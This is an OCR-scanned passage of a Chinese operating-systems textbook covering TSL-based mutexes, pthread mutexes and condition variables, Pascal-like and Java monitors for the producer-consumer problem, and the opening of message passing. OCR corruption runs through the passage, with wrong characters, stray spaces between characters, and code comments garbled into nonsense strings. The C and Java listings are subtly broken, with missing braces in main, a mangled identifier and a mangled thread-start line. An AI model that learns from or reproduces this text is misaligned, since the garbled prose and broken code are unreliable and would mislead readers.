以 很 容易 地 在 用 户 空间 中 实现 它们 。 用 于 用 户 级 线程 包 的 mutex_lock 和 
mutex_unlock 代 码 如 图 2-29 所 示 。XCHG 解 法 本 质 上 是 相同 的 。 





mutex_lock: 
TSL REGISTER,MUTEX | 将 互 斥 信号 5 量 复制 到 寄存 器 ， 并 且 将 互 斥 信号 量 置 为 1 
CMP REGISTER,#0 1 互 斥 信号 量 是 0 吗 ? 
JZE ok ree 斥 信号 号 量 为 0， 它 被 解锁 ， 所 以 返回 
CALL thread_yield | AR fe FHE: 调度 另 一 个 线程 
JMP mutex_lock | 稍 后 再 试 


ok: RET 1 返回 调用 者 ;进入 临界 区 


mutex_unlock: 
MOVE MUTEX,#0 | 将 mutex 置 为 0 
RET | 返回 调用 者 





图 2-29 mnutex_lock 和 mutex_unhlock 的 实现 


mutex_lock 的 代码 与 图 2-25 中 enter_region 的 代码 很 相似 ， 但 有 一 个 
关键 的 区 别 。 当 enter_region 进 入 临界 区 失败 时 ， 它 始终 重复 测试 锁 〈 忙 
等 待 ) 。 实 际 上 ， 由 于 时 钟 超时 的 作用 ， 会 调度 其 他 进程 运行 。 这 样 近 
早 拥有 锁 的 进程 会 进入 运行 并 释放 锁 。 


= 





E CHP) 线程 中 ， 情 形 有 所 不 同 ， 因 为 没有 时 钟 停 止 运行 时 间 过 
长 的 线程 。 结 果 是 通过 忙 等 每 的 方式 来 试图 获得 锁 的 线程 将 永远 循环 下 
去 ， 雇 不 会 得 到 锁 ， 因 为 这 个 运行 的 线程 不 会 让 其 他 线程 运行 从 而 释放 
锁 。 





以 上 就 是 enter_region 和 mutex_lock 的 差别 所 在 。 在 后 者 取 锁 失败 
时 ， 它 调用 thread_yield 将 CPU 放 弃 给 男 一 个 线程 。 这 样 ， 束 没有 忙 等 
待 。 在 该 线程 下 次 运行 时 ， 它 再 一 次 对 锁 进 行 汕 试 。 





由 于 thread_yield 只 是 在 用 户 空间 中 对 线程 调度 程序 的 一 个 调用 ， 上 所 
以 它 的 运行 非常 快捷 。 这 样 ，mutex_lock 和 mutex_unlock 都 不 需要 任何 





内 核 调 用 。 通 过 使 用 这 些 过 程 ， 用 户 线程 完全 可 以 实现 在 用 户 空间 中 的 


同步 ， 这 些 过 程 仅 仅 需 要 少量 的 指令 。 


上 面 所 叙述 的 互 斥 量 系统 是 一 套 调用 框 染 。 对 于 软件 来 说 ， 忌 是 需 
要 更 多 的 特性 ， 而 同步 原 语 也 不 例外 。 例 如 ， 有 时 线程 包 提供 一 个 调用 
mnutex_trylock， 这 个 调用 或 者 获得 锁 或 者 返回 失败 码 ， 但 并 不 阻塞 线 
程 。 这 束 给 了 调用 线程 一 个 灵活 性 ， 用 以 决定 下 一 步 做 什么 ， 是 使 用 葵 
代办 法 还 只 是 等 待 下 去 。 











到 目前 为 止 ， 我 们 掩盖 了 一 个 问题 ， 不 过 现在 还 是 有 必要 把 这 个 问 
题 提 出 来 。 在 用 户 级 线程 包 中 ， 多 个 线程 访问 同一 个 互 斥 量 是 没有 问题 
的 ， 因 为 所 有 的 线程 都 在 一 个 公共 地 址 空间 中 操作 。 但 是 ， 对 于 大 多 数 
早期 解决 方案 ， 诸 如 Peterson 算 法 和 信和 号 量 等 ， 都 有 一 个 未 说 明 的 前 
提 ， 即 这 些 多 个 进程 至 少 应 该 访问 一 些 共享 内 存 ， 也 许 仅仅 是 一 个 字 。 
如 果 进 程 有 不 连续 的 地 址 空间 ， 如 我 们 始终 提 到 的 ， 那 么 在 Peterson 算 
法 、 信 号 量 或 公共 缓冲 区 中 ， 它 们 如 何 共 享 tum 变 量 呢 ? 











有 两 种 方案 。 第 一 种 ， 有 些 共 享 数据 结构 ， 如 信号 量 ， 可 以 存放 在 
内 核 中 ， 并 且 只 能 通过 系统 调用 来 访问 。 这 种 处 理 方式 化 解 了 上 述 问 
题 。 第 二 种 ， 多 数 现代 操作 系统 〈 包 括 UNIX 和 Windows) 提供 一 种 方 
法 ， 让 进程 与 其 他 进程 共享 其 部 分 地 址 空间 。 在 这 种 方法 中 ， 缓 冲 区 和 
其 他 数据 结构 可 以 共享 。 在 最 坏 的 情形 下 ， 如 果 没 有 可 共 至 的 途 符 ， 则 
可 以 使 用 共享 文件 。 








如 果 两 个 或 多 个 进程 共享 其 全 部 或 大 部 分 地 址 空间 ， 进 程 和 线程 之 
间 的 差别 残 变 得 模糊 起 来 ， 但 无 论 怎样 ， 两 者 的 差别 还 是 有 的 。 共 享 一 
个 公共 地 址 空间 的 两 个 进程 仍 上 日 有 各 目的 打开 文件 、 报 警 定 时 喜 以 及 其 
他 一 些 单个 进程 的 特性 ， 而 在 单个 进程 中 的 线程 ， 则 共享 进程 全 部 的 特 
性 。 男 外 ， 共 至 一 个 公共 地 址 空间 的 多 个 进程 决 不 会 拥有 用 户 级 线程 的 
效率 ， 这 一 点 是 不 容 置疑 的 ， 因 为 内 核 还 同 其 管理 密切 相关 。 





Pthread 中 的 互 斥 


Pthread 提 供 许多 可 以 用 来 同步 线程 的 函数 。 其 基本 机 制 是 使 用 一 个 
可 以 被 锁定 和 解锁 的 互 斥 量 来 保护 每 个 临界 区 。 一 个 线程 如 果 想 要 进入 
临界 区 ， 它 首先 尝试 锁 住 相关 的 互 斥 量 。 如 果 互 斥 量 没有 加 锁 ， 那 么 这 
个 线程 可 以 立即 进入 ， 并 且 该 互 斥 量 被 自动 锁定 以 防止 其 他 线程 进入 。 
如 果 互 斥 量 已 经 和 " 加 锁 ， 则 调用 线程 被 阻 蹇 ， 直 到 该 互 斥 量 被 解锁 。 如 
果 多 个 线程 在 等 待 同一 个 互 斥 量 ， 当 它 被 解锁 时 ， 这 些 等 待 的 线程 中 只 
有 一 个 被 允许 运行 并 将 互 斥 量 重新 锁定 。 这 些 互 斥 锁 不 是 强制 性 的 ， 而 
古 由 程序 员 来 保证 线程 正确 地 使 用 它们 。 

















与 互 斥 量 相关 的 主要 函数 调用 如 图 2-30 所 示 。 就 像 所 期 待 的 那样 ， 
可 以 创建 和 撤销 互 斥 量 。 实 现 它们 的 函数 调用 分 别 是 pthread_mnutex_init 
与 pthread_mnutex_destroy。 也 可 以 通过 pthread_mnutex_lock 给 互 斥 量 加 
锁 ， 如 果 该 互 斥 量 已 被 加 锁 时 ， 则 会 阻塞 调用 者 。 还 有 一 个 调用 可 以 用 
来 尝试 锁 住 一 个 互 斥 量 ， 当 互 斥 量 已 被 加 锁 时 会 返回 错误 代码 而 不 是 阻 














塞 调用 者 。 这 个 调用 就 是 pthread_mnutex_trylock。 如 果 需 要 的 话 ， 该 调 
用 允许 一 个 线程 有 效 地 忙 等 待 。 最 后 ，pthread_mutex_unlock 用 来 给 一 
个 互 斥 量 解锁 ， 并 在 一 个 或 多 个 线程 等 待 它 的 情况 下 正确 地 释放 一 个 线 
程 。 互 斥 量 也 可 以 有 属性 ， 但 是 这 些 属 性 只 在 某 些 特殊 的 场合 下 使 用 。 








线程 调用 


pthread_mutex_init 建 一 个 互 斥 量 
pthread_mutex_destroy 改 销 一 个 已 存在 的 互 斥 量 


pthread_mutex_lock 获得 一 个 锁 或 阻塞 
pthread_mutex_trylock 获得 一 个 锁 或 失败 
pthread_mutex_unlock 释放 一 个 锁 


图 2-30 一 些 与 互 斥 量 相关 的 pthread 调 用 








除 互 斥 量 之 外 ，pthread 提 供 了 妃 一 种 同步 机 制 : 条 件 变 量 。 互 斥 量 
在 允许 或 阻 竖 对 临界 区 的 访问 上 是 很 有 用 的 ， 条 件 变量 则 人 允许 线程 由 于 
一 些 未 达到 的 条 件 而 阻塞 。 绝 大 部 分 情况 下 这 两 种 方法 是 一 起 使 用 的 。 
现在 让 我 们 进一步 地 研究 线程 、 互 斥 量 、 条 件 变 量 之 间 的 关联 。 











举 一 个 简单 的 例子 ， 再 次 考虑 一 下 生产 者 -消费 者 问题 ， 一 个 线程 
将 产品 放 在 一 个 缓冲 区 内 ， 由 男 一 个 线程 将 它们 取出 。 如 果 生 产 者 发 现 
绥 冲 区 中 没有 空 槽 可 以 使 用 了 ， 它 不 得 不 阻塞 起 来 直到 有 一 个 空 槽 可 以 
使 用 。 生 产 者 使 用 互 斥 量 可 以 进行 原子 性 检查 ， 而 不 受 其 他 线程 干扰 。 














但 是 当 发 现 缓冲 区 已 经 满 了 以 后 ， 生 产 者 需要 一 种 方法 来 阻塞 自己 并 在 
以 后 被 唤醒 。 这 便 古 条 件 变 量 做 的 事 了 。 


与 条 件 变量 相关 的 pthread 调 用 如 图 2-31 所 示 。 就 像 你 可 能 期 待 的 那 
样 ， 这 里 有 专门 的 调用 用 来 创建 和 撤销 条 件 变 量 。 它 们 可 以 有 属性 ， 并 
且 有 不 同 的 调用 来 管理 它们 《〈 图 中 没有 显示 ) 。 与 条 件 变量 相关 的 最 重 
要 的 两 个 操作 是 pthread_cond_wait 和 pthread_cond_signal。 前 者 阻塞 调用 
线程 直到 男 一 其 他 线程 向 它 发 信号 (使 用 后 一 个 调用 ) 。 当 然 ， 阻 塞 与 
等 待 的 原因 不 是 等 待 与 发 信号 协议 的 一 部 分 。 被 阻塞 的 线程 经 常 是 在 等 
待 发 信号 的 线程 去 做 某 些 工作 、 释 放 某 些 资源 或 是 进行 其 他 的 一 些 活 
动 。 只 有 完成 后 被 阻塞 的 线程 才 可 以 继续 运行 。 条 件 变 量 允许 这 种 等 待 
与 阻塞 原子 性 地 进行 。 当 有 多 个 线程 被 阻塞 并 等 待 同一 个 信号 时 ， 可 以 
使 用 pthread_cond_broadcast 调 用 。 




















线程 调用 
pthread_cond_init 创建 一 个 条 件 变量 
pthread_cond_destroy 获 销 一 个 条 件 变 量 


Ate /+ 


pthread_cond_wait 阻塞 以 等 待 一 个 信号 


pthread_cond_signal 向 另 一 个 线程 发 信号 
来 唤醒 它 

pthread_cond_broadcast 加 多 个 线程 发 信号 来 
让 它们 全 部 唤醒 





图 2-31 一 些 与 条 件 变量 相关 的 pthread 调 用 








条 件 变 量 与 互 斥 量 经 常 一 起 使 用 。 这 种 模式 用 于 让 一 个 线程 锁 住 一 
个 互 斥 量 ， 然 后 当 它 不 能 获得 它 期 待 的 结果 时 等 待 一 个 条 件 变 量 。 最 后 
另 一 个 线程 会 向 它 发 信号 ， 使 它 可 以 继续 执行 。pthread_cond_wait 原 子 
性 地 调用 并 解锁 它 持 有 的 互 斥 量 。 由 于 这 个 原因 ， 互 斥 量 是 参数 之 一 。 























值得 指出 的 是 ， 条 件 变 量 〈 不 像 信号 量 ) 不 会 存在 内 存 中 。 如 果 将 
一 个 信号 量 传递 给 一 个 没有 线程 在 等 待 的 条 件 变量 ， 那 么 这 个 信和 号 就 会 
丢失 。 程 序 员 必 须 小 心 使 用 避免 丢失 信和 号 





作为 如 何 使 用 一 个 互 斥 量 与 条 件 变 量 的 例子 ， 图 2-32 展 示 了 一 个 非 
常 简 单 只 有 一 个 缓冲 区 的 生产 者 -消费 者 问题 。 当 生产 者 填 满 缓 冲 区 
时 ， 它 在 生产 下 一 个 数据 项 之 前 必须 等 每 ， 直 到 消费 者 清空 了 它 。 类 似 
地 ， 当 消费 者 移 走 一 个 数据 项 时 ， 它 必须 等 待 ， 直 到 生产 者 生产 了 另外 
一 个 数据 项 。 尽 管 很 简单 ， 这 个 例子 却说 明了 基本 的 机 制 。 使 一 个 线程 
睡眠 的 语句 应 该 总 是 要 检查 这 个 条 件 ， 以 保证 线程 在 继续 执行 前 满足 条 
件 ， 因 为 线程 可 能 已 经 因为 一 个 UNIX 信 和 号 或 其 他 原因 而 被 唤醒 。 


























#include <stdio.h> 

#include <pthread.h> Ea 

#define MAX 1000000000 需要 生产 的 数量 */ 

pthread_mutex_t the_mutex; 

pthread_cond_t conde, condp; A f ami 

int buffer = 0; * 生产 者 消费 者 使 用 的 缓冲 区 */ 

void *producer(void *ptr) 放生 产 数据 */ 

{ int i; 

for (i= 1; i <= MAX; i++) { oa ate n paar te 

pthread_mutex_lock(&the_mutex); /* He HH Ae X */ 
while (buffer != 0) pthread_cond_wait(&condp, &the_mutex); 
buffer = i; I* 5 BHR IMA BET LX */ 
pthread_cond_signal(&condc); /* 唤醒 消费 者 */ 
pthread_mutex_unlock(&the_mutex); 上 释放 缓冲 区 */ 


} 
pthread_exit(0); 


} 


void *consumer(void *ptn) I 消费 数据 */ 
{ int i; 
for (i = 1; i <= MAX; i++) { 

pthread_mutex_lock(&the_mutex); /* 互 斥 使 用 缓冲 区 */ 
while (buffer ==0 ) pthread_cond_wait(&condc, &the_mutex); 
buffer = 0; E 从 缓冲 区 中 取出 数据 */ 
pthread_cond_signal(&condp); [* 唤醒 生产 者 */ 
pthread_mutex_unlock(&the_mutex);/* 释放 缓冲 区 */ 


} 
pthread_exit(0); 
} 


int main(int argc, char **argv) 


pthread_t pro, con; 
pthread_mutex_init(&the mutex, 0); 
pthread_cond_init(&condc, 0); 
pthread_cond_init(&condp, 0); 
pthread_create(&con, 0, consumer, 0); 
pthread_create(&pro, 0, producer, 0); 
pthread_join(pro, 0); 
pthread_join(con, 0); 
pthread_cond_destroy(&condc); 
pthread_cond_destroy(&condp); 
pthread_mutex_destroy(&the_mutex); 





图 2-32 利用 线程 解决 生产 者 -消费 者 问题 





有 了 信和 号 量 和 互 斥 量 之 后 ， 进 程 间 通 信 看 来 就 很 容易 了 ， 实 际 是 这 
样 的 吗 ? 答案 是 否定 的 。 请 仔细 考察 图 2-28 中 疝 缓 种 区 放 入 数据 项 以 及 
从 中 删除 数据 项 之 前 的 down 操 作 。 假 设 将 生产 者 代码 中 的 两 个 down 操 
作 交 换 一 下 次 序 ， 将 使 得 mutex 的 值 在 empty 之 前 而 不 是 在 其 之 后 被 减 
1。 如 果 组 冲 区 完全 满 了 ， 生 产 者 将 阻塞 ，mutex 值 为 0。 这 样 一 来 ， 当 
消费 者 下 次 试图 访问 缓冲 区 时 ， 它 将 对 mutex 执 行 一 个 down 操 作 ， 由 于 
mutex 值 为 0， 则 消费 者 也 将 阻塞 。 两 个 进程 都 将 永远 地 阻塞 下 去 ， 无 法 
再 进行 有 效 的 工作 ， 这 种 不 羊 的 状况 称 作 死 锁 〈dead lock) 。 我 们 将 在 


第 6 章 中 详细 讨论 死 锁 问题 。 





指出 这 个 问题 是 为 了 说 明 使 用 信号 量 时 要 非常 小 心 。 一 处 很 小 的 错 
误 将 导致 很 大 的 厂 烦 。 这 就 像 用 汇编 语言 编程 一 样 ， 甚 至 更 糟 ， 因 为 这 
里 出 现 的 错误 都 是 竞争 条 件 、 死 锁 以 及 其 他 一 些 不 可 预测 和 不 可 再 现 的 
行为 。 














为 了 更 易于 编写 正确 的 程序 ，Brinch Hansen (1973) 和 
Hoare (1974) 提出 了 一 种 高 级 同步 原 语 ， 称 为 管 程 (monitor) 。 在 下 
面 的 介绍 中 我 们 会 发 现 ， 他 们 两 人 提出 的 方案 略 有 不 同 。 一 个 管 程 是 
个 由 过 程 、 变 量 及 数据 结构 等 组 成 的 一 个 集合 ， 它 们 组 成 一 个 特殊 的 模 





块 或 软件 包 。 进 程 可 在 任何 需要 的 时 候 调 用 管 程 中 的 过 程 ， 但 它们 不 能 
在 管 程 之 外 声明 的 过 程 中 直接 访问 宣 程 内 的 数据 结构 。 图 2-33 展 示 了 用 
一 种 抽象 的 、 类 Pascal 语 言 描述 的 管 程 。 这 里 不 能 使 用 C 语 言 ， 因 为 管 


程 是 语言 概念 而 C 语 言 并 不 文 持 它 。 











monitor example 
integer i; 
condition c; 


procedure producer( ); 


end: 
procedure consumer( ); 


end; 
end monitor: 





图 233 管 程 


管 程 有 一 个 很 重要 的 特性 ， 即 任 一 时 刻 管 程 中 只 能 有 一 个 活跃 进 
程 ， 这 一 特性 使 管 程 能 有 效 地 完成 互 斥 。 管 程 是 编程 语言 的 组 成 部 分 ， 
编译 器 知道 它们 的 特殊 性 ， 因 此 可 以 采用 与 其 他 过 程 调用 不 同 的 方法 来 
处 理 对 管 程 的 调用 。 典 型 的 处 理 方法 是 ， 当 一 个 进程 调用 管 程 过 程 时 ， 
该 过 程 中 的 前 儿 条 指令 将 检查 在 管 程 中 是 否 有 其 他 的 活跃 进程 。 如 果 














有 ， 调 用 进程 将 被 挂 起 ， 直 到 男 一 个 进程 离开 管 程 将 其 唤醒 。 如 果 没 有 
活跃 进程 在 使 用 管 程 ， 则 该 调用 进程 可 以 进入 。 


进入 管 程 时 的 互 斥 由 编译 需 负 责 ， 但 通 利 的 做 法 是 用 一 个 互 斥 量 或 
二 元 信号 量 。 因 为 是 由 编译 器 而 非 程序 员 来 安排 互 斥 ， 所 以 出 错 的 可 能 
性 要 小 得 多 。 在 任 一 时 刻 ， 写 管 程 的 人 无 须 关 心 编 译 器 是 如 何 实现 互 斥 
的 。 他 只 需 知道 将 所 有 的 临界 区 转换 成 管 程 过 程 即 可 ， 决 不 会 有 两 个 进 
程 同时 执行 临界 区 中 的 代码 。 











尽管 如 我 们 上 边 所 看 到 的 ， 管 程 提 供 了 一 种 实现 互 斥 的 简便 途径 ， 
但 这 还 不 够 。 我 们 还 需要 一 种 办 法 使 得 进程 在 无 法 继续 运行 时 被 阻塞 。 
在 生产 者 -消费 者 问题 中 ， 很 容易 将 针对 绥 冲 区 满 和 缓冲 区 空 的 测试 放 
到 管 程 过 程 中 ， 但 是 生产 者 在 及 现 缓冲 区 满 的 时 候 如 何 阻 塞 呢 ? 





解决 的 方法 是 引入 条 件 变量 (condition variables) 以 及 相关 的 两 个 
操作 : wait 和 signal。 当 一 个 管 程 过 程 发 现 它 无 法 继续 运行 时 《例如 ， 生 
产 者 发 现 缓冲 区 满 ) ， 它 会 在 荣 个 条 件 变量 上 〈 如 full) 执行 wait 操 作 。 
该 操作 导致 调用 进程 自身 阻 故 ， 并 且 还 将 另 一 个 以 前 等 在 管 程 之 外 的 进 
程 调 入 省 程 。 在 前 面 介绍 pthread 时 我 们 已 经 看 到 条 件 变 量 及 其 操作 了 。 








男 一 个 进程 ， 比 如 消费 者 ， 可 以 唤醒 正在 睡眠 的 伙伴 进程 ， 这 可 以 
通过 对 其 伙伴 正在 等 竺 的 一 个 条 件 变 量 执行 signal 完 成 。 为 了 避免 管 程 
中 同时 有 两 个 活跃 进程 ， 我 们 需要 一 条 规则 来 通知 在 signal 之 后 该 怎么 








办 。Hoare 建 议 让 新 唤醒 的 进程 运行 ， 而 挂 起 为 一 个 进程 。Brinch 
Hansen 则 建议 执行 signal 的 进程 必须 立即 退出 管 程 ， 即 signal 语 句 只 可 能 
作为 一 个 管 程 过 程 的 最 后 一 条 语句 。 我 们 将 采纳 Brinch Hansen 的 建议 ， 
因为 它 在 概念 上 更 简单 ， 并 且 更 容易 实现 。 如 果 在 一 个 条 件 变 量 上 有 大 
干 进程 正在 等 等， 则 在 对 该 条 件 变 量 执行 signal 操 作 后 ， 系 统 调度 程序 
只 能 在 其 中 选择 一 个 使 其 恢复 运行 。 

















顺便 提 一 下 ， 还 有 一 个 Hoare 和 Brinch Hansen 都 没有 提 及 的 第 三 种 
方法 ， 该 方法 让 发 信号 者 继续 运行 ， 并 且 只 有 在 发 信号 者 退出 管 程 之 
后 ， 才 允许 等 待 的 进程 开始 运行 。 








条 件 变量 不 是 计数 器 ， 条 件 变 量 也 不 能 像 信号 量 那样 积累 信号 以 便 
以 后 使 用 。 所 以 ， 如 果 问 一 个 条 件 变量 发 送信 号 ， 但 是 在 该 条 件 变 量 上 
并 没有 等 街 进程 ， 则 该 信号 会 永远 丢失 。 换 句 话 次 ，wait 操 作 必须 在 
signal 之 前 。 这 条 规则 使 得 实现 简单 了 许多 。 实 际 上 这 不 是 一 个 问题 ， 
因为 在 需要 时 ， 用 变量 很 容易 跟踪 每 个 进程 的 状态 。 一 个 原本 要 执行 
signal 的 进程 ， 只 要 检查 这 些 变 量 便 可 以 知道 该 操作 是 否 有 必要 

















在 图 2-34 中 给 出 了 用 类 Pascal 语 言 ， 通 过 管 程 实现 的 生产 者 -消费 者 
问题 的 解法 框架 。 使 用 类 Pascal 语 言 的 优点 在 于 清晰 、 简 单 ， 并 且 严 格 


符合 Hoare/Brinch Hansen 模 型 。 


monitor ProducerConsumer 
condition full, empty: 
integer count; 


procedure insert(item: integer); 
begin 

if count = N then wait(full): 

insert _item(item); 

count := count + 1; 

if count = ] then signal(empty) 
end; 


function remove: integer: 
begin 
if count = 0 then wait(empty); 
remove = remove _item, 
count := count — 1; 
if count = N — | then signal(ful!) 


end; 


count := 0; 
end monitor; 


procedure producer, 
begin 
while true do 
begin 
item = produce _item, 
ProducerConsumer.insert(item) 
end 
end; 


procedure consumer; 
begin 
while true do 
begin 
item = ProducerConsumer.remove, 
consume _item(item) 
end 





图 2-34 用 管 程 实现 的 生产 者 -消费 者 问题 的 解法 框架 。 一 次 只 能 有 一 
个 管 程 过 程 活跃 。 其 中 的 缓冲 区 有 N 个 模 


读者 可 能 会 觉得 wait 和 signal 操 作 看 起 来 像 前 面 提 到 的 sleep 和 
wakeup， 而 我 们 已 经 看 到 后 者 存在 严重 的 竞 搜 条 件 。 是 的 ， 它 们 确实 很 
像 ， 但 是 有 个 很 关键 的 区 别 : sleep 和 wakeup 之 所 以 失败 是 因为 当 一 个 进 
星 想 睡眠 时 另 一 个 进程 试图 去 唤醒 它 。 使 用 管 程 则 不 会 发 生 这 种 情况 。 
对 管 程 过 程 的 自动 互 斥 保证 了 这 一 点 : 如 果 管 程 过 程 中 的 生产 者 发 现 组 
冲 区 满 ， 它 将 能 够 完成 wait 操 作 而 不 用 担心 调度 程序 可 能 会 在 wait 完 成 
之 前 切换 到 消费 者 。 甚 全， 在 wait 执 行 完成 而 且 把 生产 者 标志 为 不 可 运 
行 之 前 ， 根 本 不 会 允许 消费 者 进入 管 程 。 











尽管 类 Pascal 是 一 种 想象 的 语言 ， 但 还 是 有 一 些 真 正 的 编程 语言 文 
持 管 程 ， 不 过 它们 不 一 定 是 Hoare 和 Brinch Hansen 所 设计 的 模型 。 其 中 
一 种 语言 是 Java。Java 是 一 种 面 癌 对 象 的 语言 ， 它 文 持 用 户 级 线程 ， 还 
允许 将 方法 (过 程 ) 划 分 为 类 。 只 要 将 关键 词 synchronized 加 入 到 方法 
声明 中 ，Java 保 证 一 旦 某 个 线程 执行 该 方法 ， 束 不 允许 其 他 线程 执行 该 
对 象 中 的 任何 synchronized 方 法 。 





使 用 Java 管 程 解决 生产 者 -消费 者 问题 的 解法 如 图 2-35 所 示 。 该 解法 
中 有 4 个 类 。 外 部 类 (outer class) ProducerConsumer 创 建 并 启动 两 个 线 


程 ，p 和 c。 第 二 个 类 和 第 三 个 类 producer 和 consumer 分 别 包含 生产 者 和 





消费 者 的 代码 。 最 后 ， 类 our_ monitor 是 管 程 ， 它 有 两 个 同步 线程 ， 用 于 
在 共享 缓冲 区 中 插入 和 取出 数据 项 。 与 前 面 的 例子 不 同 ， 我 们 在 这 里 给 
出 了 insert 和 remove 的 全 部 代码 。 


在 前 面 所 有 的 例子 中 ， 生 产 者 和 消费 者 线程 在 功能 上 与 它们 的 等 同 
部 分 是 相同 的 。 生 产 者 有 一 个 无 限 循环 ， 该 无 限 循 环 产生 数据 并 将 数据 
放 入 公共 缓冲 区 中 ;消费 者 也 有 一 个 等 价 的 无 限 循环 ， 该 无 限 循环 从 公 
共 绥 冲 区 取出 数据 并 完成 一 些 有 趣 的 工作 。 





该 程序 中 比较 意思 的 部 分 是 类 our_monitor， 它 包含 缓冲 区 、 管 理 变 
量 以 及 两 个 同步 方法 。 当 生产 者 在 insert 内 活动 时 ， 它 确信 消费 者 不 能 
在 remove 中 活动 ， 从 而 保证 更 新 变量 和 缓冲 区 的 安全 ， 且 不 用 担心 竞争 
条 件 。 变 量 count 记 录 在 组 种 区 中 数据 项 的 数量 。 它 的 取 值 可 以 取 从 0 到 
N-1 之 间 任 何 值 。 变 量 lo 是 缓冲 区 横 的 序号 ， 指 出 将 要 取出 的 下 一 个 数 
据 项 。 类 似 地 ，Hi 是 组 种 区 中 下 一 个 将 要 放 入 的 数据 项 序号 。 多 许 
lo=hi， 其 含义 是 在 缓冲 区 中 有 0 个 或 N 个 数据 项 。count 的 值 说 明了 完 竟 
古 哪 一 种 情形 。 











Java 中 的 同步 方法 与 其 他 经 典 管 程 有 本 质 差别 : Java BOA WN ERE 
件 变量 。 反 之 ，Java 提 供 了 两 个 过 程 wait 和 notify， 分 别 与 sleep 和 wakeup 
等 价 ， 不 过 ， 当 它们 在 同步 方法 中 使 用 时 ， 它 们 不 受 竞争 条 件 约束 。 理 
论 上 ， 方 法 wait 可 以 被 中 断 ， 它 本 身 就 是 与 中 断 有 关 的 代码 。Java 需 要 
显 式 表示 异常 处 理 。 在 本 文 的 要 求 中 ， 只 要 认为 go_to_sleep 就 是 去 睡眠 
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通过 临界 区 互 斥 的 自动 化 ， 管 程 比 信号 量 更 容易 保证 并 行 编程 的 正 
确 性 。 但 管 程 也 有 缺点 。 我 们 之 所 以 使 用 类 Pascal 和 Java， 而 不 像 在 本 
书 中 其 他 例子 那样 使 用 C 语 言 ， 并 不 是 没有 原因 的 。 正 如 我 们 前 面 提 到 
过 的 ， 管 程 是 一 个 编程 语言 概念 ， 编 详 费 必须 要 识别 管 程 并 用 茶 种 方式 
对 其 互 帮 做 出 安排 。C、Pascal 以 及 多 数 其 他 语言 都 没有 管 程 ， 所 以 指 
望 这 些 编译 器 遵守 互 斥 规则 是 不 合理 的 。 实 际 中 ， 如 何 能 让 编译 器 知道 
哪些 过 程 属于 管 程 ， 哪 些 不 属于 管 程 呢 ? 























在 上 述 语言 中 同样 也 没有 信号 量 ， 但 增加 信和 号 量 是 很 容易 的 : 读者 
需要 做 的 束 是 同 库 里 加 入 两 段 短小 的 汇编 程序 代码 ， 以 执行 Wp 和 down 
系统 调用 。 编 译 器 甚至 用 不 着 知道 它们 的 存在 。 当 然 ， 操 作 系 统 必 须知 
道 信 号 量 的 存在 ， 或 至 少 有 一 个 基于 信号 量 的 操作 系统 ， 读 者 仍旧 可 以 
使 用 C 或 C++《〈 甚 至 是 汇编 语言 ， 如 果 读 者 乐意 的 话 ) 来 编写 用 户 程 
序 ， 但 是 如 采 使 用 管 程 ， 读 者 就 需要 一 种 带 有 管 程 的 语言 。 



































public class ProducerConsumer { 
static final int N = 100; ”4 定义 缓冲 区 大 小 的 常量 l 
static producer p = new producer(); /初始 化 一 个 新 的 生产 者 线程 
static consumer c = new consumer( ); // 初始 化 一 个 新 的 消费 者 线程 
Static our_monitor mon = new our_monitor(); W 初始 化 一 个 新 的 管 程 


public static void main(String args[]) { 
p.start(); W 开始 生产 者 线程 
| OSORO: 开始 消费 者 线程 


static class producer extends Thread { 
public void run() {// run 方 法 包含 了 线程 代码 
int item; 
while (true) {  // 生产 者 循环 
item = produce _item(); 
mon.insert(item); 
} 
} l 
private int produce_item(){...} /实际 生产 
} 


static class consumer extends Thread { 
public void run() {// run 方 法 包含 了 线程 代码 
int item; i 
while (true) {  // 消费 者 循环 
item = mon.remove( ); 
consume _item (item); 
} 
} 
private void consume _item(int item) { .JW 实际 消费 


} 


static class our_monitor { // 这 是 一 个 管 程 
private int buffer[] = new int[N]; i sin i 
private int count = 0, lo = 0, hi = 0; / 计数 器 和 索引 


public synchronized void insert(int val) { 
if (count == N) go_to_sleep(); / 如 果 缓 冲 区 满 ， 则 进入 休 眼 
buffer [hi] = val; // 向 缓冲 区 中 插入 一 个 新 的 数据 项 
hi=(hi+1)%N; /设置 下 一 个 数据 项 的 覃 
count= count+1; /缓冲 区 中 的 数据 项 又 多 了 一 项 
if (count == 1) notify(); UW 如果 消 费 者 在 休 眼 ， 则 将 其 唤醒 
} 


public synchronized int remove( ) { 
int val; 
if (count == 0) go_to_sleep(); / WRAY Kae, BEA PRI 
val = buffer [lo]; / 从 缓冲 区 中 取出 一 个 数据 项 
lo=(lo+1)%N;  V 设置 待 取 数 据 项 的 横 
count = count- 1;  // 缓冲 区 中 的 数据 项 数目 减少 1 
if (count == N 一 1) notify(); / 如 果 生 产 者 在 休眠 ， 则 将 其 唤醒 
return val; 
} 
private void go_to_sleep() { try{wait();} catch(InterruptedException exc) {};} 


} 





图 2-35 用 Java 语 言 实现 的 生产 者 -消费 者 问题 的 解法 





与 管 程 和 信号 量 有 关 的 男 一 个 问题 是 ， 这 些 机 制 都 是 设计 用 来 解决 
访问 公共 内 存 的 一 个 或 多 个 CPU 上 的 互 斥 问题 的 。 通 过 将 信号 量 放 在 共 
享 内 存 中 并 用 TSL 或 XCHG 指 令 来 保护 它们 ， 可 以 避免 竞争 。 如 果 一 个 
分 布 式 系统 具有 多 个 CPU， 并 且 每 个 CPU 拥有 自己 的 私有 内 存 ， 它 们 通 
过 一 个 局 域 网 相连 ， 那 么 这 些 原 语 将 失效 。 这 里 的 结论 是 : 信和 号 量 太 低 
级 了 ， 而 管 程 在 少数 几 种 编程 语言 之 外 又 无 法 使 用 ， 并 且 ， 这 些 原 语 均 
未 提供 机 器 间 的 信息 交换 方法 。 所 以 还 需要 其 他 的 方法 。 














2.3.8 消息 传递 





上 面 提 到 的 其 他 的 方法 就 是 消 恩 传递 (message passing) 。 这 种 进 
程 间 通信 的 方法 使 用 两 条 原 语 send 和 receive， 它 们 像 信号 量 而 不 像 管 
程 ， 是 系统 调用 而 不 是 语言 成 分 。 因 此 ， 可 以 很 容易 地 将 它们 加 入 到 库 
例 程 中 去 。 例 如 : 


send (destination, &message) ; 


和 





receive (source, &message) ; 








前 一 个 调用 癌 一 个 给 定 的 目标 发 送 一 条 消息 ， 后 一 个 调用 从 一 个 给 
定 的 源 〈 或 者 是 任意 源 ， 如 宋 接 收 者 不 介意 的 话 ) 接收 一 条 消息 。 如 果 
